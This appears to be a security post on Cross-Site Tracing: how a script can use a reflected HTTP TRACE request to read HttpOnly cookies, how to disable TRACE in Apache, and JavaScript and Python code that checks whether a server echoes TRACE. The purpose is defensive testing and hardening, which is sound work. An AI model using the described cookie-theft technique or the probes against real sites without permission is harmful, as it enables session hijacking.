It is common knowledge that cookies are transported over the Internet in HTTP headers, and hence if you can view the headers you have a chance of gleaning information from the cookie and gaining access to a session which relies on cookies to keep track of a user. An attacker gets a naive user’s browser to run a script that sends a TRACE request to the target server. When the request is reflected back to the browser, the script can pull out any cookies and send them to the attacker. This type of attack is generally used when ordinary cross-site scripting won’t work because the site uses the “HttpOnly” flag on its cookies.

For Apache versions above 1.3.34 in the legacy series, and 2.0.55 or newer for Apache 2, disabling TRACE is very easy, because there is a new Apache directive that controls whether the TRACE method is enabled or not:

TraceEnable off

This needs to be added to the main server configuration; the default is enabled (on). TraceEnable off causes Apache to return a 403 FORBIDDEN error to the client.

Here’s some testing code which can help you find out whether sending the web server a TRACE HTTP request returns the headers and the entire conversation.

<script type="text/javascript">
<!--
// Sends a synchronous TRACE request and shows whatever the server echoes back.
// Note: current browsers refuse TRACE in XMLHttpRequest (open() throws), so this
// check only works in browsers of the era the post was written; a command-line
// HTTP client performs the same test today.
function TraceSend(){
  var request=false;
  if(window.XMLHttpRequest){
    try{
      request=new XMLHttpRequest();
    }catch(e){
      request=false;
    }
  }else if(window.ActiveXObject){
    try{
      request=new ActiveXObject("Msxml2.XMLHTTP");
    }catch(e){
      try{
        request=new ActiveXObject("Microsoft.XMLHTTP");
      }catch(e2){
        request=false;
      }
    }
  }
  if(request){
    // replace http://website with the server under test
    request.open("TRACE", "http://website", false);
    request.send(null);
    var buf=request.responseText;
    alert(buf);
  }
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick="TraceSend();" VALUE="Check TRACE">
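As an added example, not code from the post, the same TRACE check done from the command line in Python: a canary header is sent in a TRACE request, and the server counts as exposed only if it reflects that canary in a 2xx response, which is exactly what an XST script needs. The two handlers are constructed stand-ins for a server with TRACE still on and one that refuses it; CANARY_HEADER is an assumed name.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

CANARY_HEADER = "X-Trace-Canary"   # assumed name; any unusual header works


class EchoTraceHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for a server that still honours TRACE: it reflects
    the request line and headers, cookies included, back to the client."""
    def do_TRACE(self):
        body = (self.requestline + "\r\n" + str(self.headers)).encode("latin-1")
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


class DenyTraceHandler(EchoTraceHandler):
    """Constructed stand-in for a hardened server: TRACE is refused outright."""
    def do_TRACE(self):
        self.send_error(405)


def reflects_trace(status: int, body: str, canary: str) -> bool:
    """A 2xx status alone is not proof; the canary must come back in the body."""
    return 200 <= status < 300 and canary in body


def trace_enabled(host: str, port: int, path: str = "/") -> bool:
    """True when the server echoes a TRACE request back (the XST precondition)."""
    canary = "xst-probe-20091112"
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("TRACE", path, headers={CANARY_HEADER: canary})
        resp = conn.getresponse()
        body = resp.read().decode("latin-1", "replace")
    finally:
        conn.close()
    return reflects_trace(resp.status, body, canary)


def _serve(handler):
    srv = HTTPServer(("127.0.0.1", 0), handler)      # port 0: pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_demo() -> dict:
    """Probe both constructed servers; reports which one is still XST-exposed."""
    results = {}
    for label, handler in (("trace-on", EchoTraceHandler), ("trace-off", DenyTraceHandler)):
        srv = _serve(handler)
        try:
            results[label] = trace_enabled("127.0.0.1", srv.server_address[1])
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for label, exposed in run_demo().items():
        print(f"{label}: {'TRACE reflected, XST possible' if exposed else 'TRACE refused'}")
```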
